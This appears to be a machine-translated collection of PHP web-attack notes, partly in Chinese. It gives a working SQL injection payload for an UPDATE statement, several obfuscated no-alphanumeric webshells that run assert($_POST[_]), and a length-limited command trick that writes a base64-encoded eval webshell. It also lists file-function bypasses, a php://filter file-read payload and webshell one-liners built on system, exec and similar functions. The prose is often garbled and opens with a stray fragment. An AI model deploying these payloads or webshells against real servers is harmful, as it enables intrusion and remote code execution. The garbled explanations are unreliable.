Most cattle from p
SQL注入(left join)
Source
<?php
$link = mysqli_connect('localhost', 'root', 'root');
mysqli_select_db($link, 'code');
$table = addslashes($_GET['table']);
$sql = "UPDATE `{$table}`
SET `username`='admin'
WHERE id=1";
if(!mysqli_query($link, $sql)) {
echo(mysqli_error($link));
}
mysqli_close($link);
After injecting statement
UPDATE `table` t left join (select char(97) as user from dual where (extractvalue(1,concat(0x7e,(select user()),0x7e)))) tt on tt.user=t.username
SET username='admin'
WHERE id=1;
Injecting ideas
Source using
addslashes
a filter user input, single double quotation marks, as well as a backslash will be escaped;- Secondly, the entire SQL statement did not write a single line of code, you can not use the normal single-line comments to annotate, UPDATE operation is different from SELECT operations, SELECT operate more freely, it can be freely combined UNION operation, multi-semicolon statement is executed, but the operation can UPDATE joint inquiry with LEFT JOIN;
- Seen from the source code, which was given back to the presence of the SQL statement
char
coding- Use
left join
joint inquiry - Use error injection
char
coding
It does not contain numbers and letters webshell
Reprinted Source: PHITHON
Help feel free to kill, too WAF, it can directly help AntSword
Source
<?php
if(!preg_match('/[a-z0-9]/is',$_GET['shell'])) {
eval($_GET['shell']);
}
?>
Thinking
By converting the character through various non-alphanumeric character, any character is then constructed, using the properties of the final PHP dynamic function performed, by virtue of a function name, and perform the function
PHP7 presence PHP5 and some differences, such as: the PHP5 assert
can execute arbitrary code as a function $f='assert';$f(...);
,
In PHP7 rather assert
than a function, the structure becomes a language, the code can not be executed as the function name, but may be utilized other similar functions getshell
, such as:file_put_content
PS: file_put_contents(filename,content,8)以追加模式写入文件
method one
Two non-alphabetic or non-numeric characters exclusive operation generates a specified character, and so on, to obtain an estimate of all alphanumeric and other
<?php
$_='assert'; //$_='assert'
$__='_'.'POST'; //$__='_'.'POST'
$___=$$__; //$___=$_POST
$_($___[_]); //assert($_POST[_])
?>
Each letter is XORed acquired by the two non-alphanumeric non-numeric characters, then splicing
Method Two
Using UTF-8 encoding certain characters, and wherein a character taken out, such as: 'and' {2} the Chinese character "and" the result of the second character "\ x8c", which is the inverted letter s
, this method can be obtained by any letter, figure 2 which can be ('>'>'<')+('>'>'<')
acquired
<?php
$__=('>'>'<')+('>'>'<');
$_=$__/$__;
$____='';
$___="瞰";$____.=~($___{$_});$___="和";$____.=~($___{$__});$___="和";$____.=~($___{$__});$___="的";$____.=~($___{$_});$___="半";$____.=~($___{$_});$___="始";$____.=~($___{$__});
$_____='_';$___="俯";$_____.=~($___{$__});$___="瞰";$_____.=~($___{$__});$___="次";$_____.=~($___{$_});$___="站";$_____.=~($___{$_});
$_=$$_____;
$____($_[$__]);
?>
Method Three
In PHP have several features:
Force the splicing array and string, the array will be converted into a string, the result is
Array
'a'++
getb
2
equal('>'>'<')+('>'>'<')
<?php
$_=[]; //定义$_为数组格式
$_=@"$_"; //通过@关键字将数组强制转换成字符串,导致成为 $_='Array';
$_=$_['!'=='@']; // $_=$_[0];
$___=$_; // A
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__; // S
$___.=$__; // S
$__=$_;
$__++;$__++;$__++;$__++; // E
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$___.=$__;
$____='_';
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$____.=$__;
$_=$$____;
$___($_[_]); // ASSERT($_POST[_]);
?>
Characteristics php file manipulation functions
Source: http: //www.am0s.com/functions/386.html
file_put_contents
The first parameter is the file name, the second parameter is an array# for example http://127.0.0.1/shell.php?param[0]=<¶m[1]=?php phpinfo();
In general,
param
a single string parameter, but because the rear end of languagePHP
, combined withfile_put_content
the characteristics of the format described above may be employed herein so array parameterfile_put_contents
,copy
,file_get_contents
And other read and write operationsunlink
,file_exists
the presence of the processing path between the document file functions like Analyzing some differences, resulting in the function determination function for use with the file and writing files in the current plane, resulting in bypassing deleted; read file function to convert the file before writing the file path into an absolute path and then processed, and will only function to determine whether a file file name exists, the relative path will not be processed, so as to achieve bypasslinux可通过../test.php、test.php/. 来绕过删除 windows可通过test.php:test tst.ph<绕过文件删除 Windows举例(windows不支持 \ / : * ? " < > | 所以会自动将后面的字符过滤掉) http://127.0.0.1/l.php?user[name]=2.php:test&user[info]=2y 会生成2.php http://127.0.0.1/l.php?user[name]=2.ph<&user[info]=2y 会写入内容
Personally feel that there may be some usefulness when deleting temporary files, the environment is too complex, it is difficult to meet the conditions of the actual scene
eval length limit bypass
Source
<?php
$param=$_REQUEST['param'];
if(strlen($param)<17&&strpos($param,'eval')===false&& strpos($param,'assert')==false){
eval($param);
}
?>
- Parameter equal to the length of less than 16
- You can not use
assert
andeval
function
Seven break character limit arbitrary command execution
Source
<?php
if(strlen($_GET[1])<8){
echo shell_exec($_GET[1]);
}
?>
Thinking
First, this shows that PHP code logic: must be able to execute arbitrary code, and only by the length limit, so a last resort: Redirect under Linux. Because of limited length, so the use of mildly point means
# w在linux下用于查看用户当前登录状态
# > 在Linux中代表重定向
# 下面的命令意思是:将w生成的输出重定向到文件名为php,结果在当前目录下就会生成文件名为php的文件,考虑到有些关键字母可能会影响命令执行,如>,因此在写入木马字符串时,采用经过base64编码的木马字符串,相当于采用这种方法生成一个一句话变形木马
w > php
# 上述方法可以在当前目录生成我们想要生成的文件名的文件,然后我们需要将这些文件名进行拼接形成一个完整的木马字符串,最后写入文件
#这条命令能按照时间顺序对文件进行排序,并将所有文件名进行拼接写入文件0中
ls -t>0
# 最后执行shell脚本,生成php木马文件
sh 0
# 文件名拼接后完整字符串为:
echo PD9waHAgZXZhbCgkX0dFVFsxXSk7| base64 -d>c.php
Method One: command execution
eval
Hazard: execute arbitrary PHP code
Parameters: String
Note: In PHP5.x, if there is code execution parse error
will not affect the implementation of the follow-up code; but in PHP7.x, once the existence of a code execution parse error
, then the subsequent code eval
function will not be executed properly, and will throw ParseError
an exception
assert
Hazard: The first argument assertion
is treated as PHP code execution
Parameters: Parameters necessary assertion
as the code string is performed as the optional parameter description
when assertion
performing fails, an error message is returned as part of the display
preg_replace
Hazard: When using this function /e
when the modifier preg_replace
would replacement
parameter as PHP code execution
Parameters: pattern
search pattern, string or array of strings; replacement
is to replace string or array of strings, subject
a string or an array of strings for the search and replace; limit
is the number of replacements, -1 indicates unlimited; count
designated the complete number of replacements
Principle: Using \e
the model, preg_replace
the function after the completion of the replacement string, use the eval
function execution results for evaluation, where he achieved the purpose of execution of PHP code
Note: From PHP.5.5.0, \e
mode will produce E_DEPRECATED
an error; starting from PHP7.0.0, \e
will generate E_WARNING
an error
create_function
Hazard: Order Execution System
Instructions:
The second parameter is the callback function, the first parameter as the callback parameter
$newFunc=create_function('$v','return system($v);');
$newFunc('whoami');
call_user_func
Function: command execution
Usage: The first parameter is a callback function, other parameters as parameters callback
call_user_func(system,$_GET[cmd]);
call_user_func_array
Function: command execution, and call_user_func_array
similar
Instructions:
The first parameter as the callback, the callback function parameters of the array as a parameter
call_user_func_array(file_put_contents,['filename','木马字符串'])
call_user_func_array(system,[$_GET['cmd']])
File contains
At the two file contains: it contains local files, remote files contain, directly getshell, but also protocols such as file through a local file read
include($_GET['file']);
?file=php://filter/convert.base64-encode/resource=index.php
解释:?file=php://协议/过滤器/文件
include
require
include_once
require_once
Command Execution Functions
exec
Function: to execute an external program
Instructions:echo exec($_GET[cmd]);
passthru
Function: Perform external program and display raw output
Instructions:passthru($_GET[cmd]);
proc_open
Function: execute a command, and to open the input / output files
Instructions:https://php.net/manual/zh/function.proc-open.php
shell_exec
Function: Run through output shell environment, and returns the complete string in a manner
Instructions:echo shell_exec($_GET[cmd]);
system
Function: Execute external program, and display the output
Instructions:system($_GET[cmd]);
popen
A command parameter passed by popen (), and popen open files and perform
Instructions:https://php.net/manual/zh/function.popen.php